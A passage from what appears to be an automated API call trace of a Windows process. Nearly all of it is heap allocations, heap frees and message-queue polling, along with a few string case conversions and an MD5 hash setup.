wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.760] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.760] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.761] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.761] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.761] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.762] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.762] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.762] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.762] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.762] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.762] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.764] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0199.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.765] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0199.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.766] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.767] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.767] CryptHashData (hHash=0xaa58a0, pbData=0x24b1468, dwDataLen=0x3, dwFlags=0x1) returned 1 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0199.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0199.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.772] PeekMessageW (in: lpMsg=0x8bf3c0, 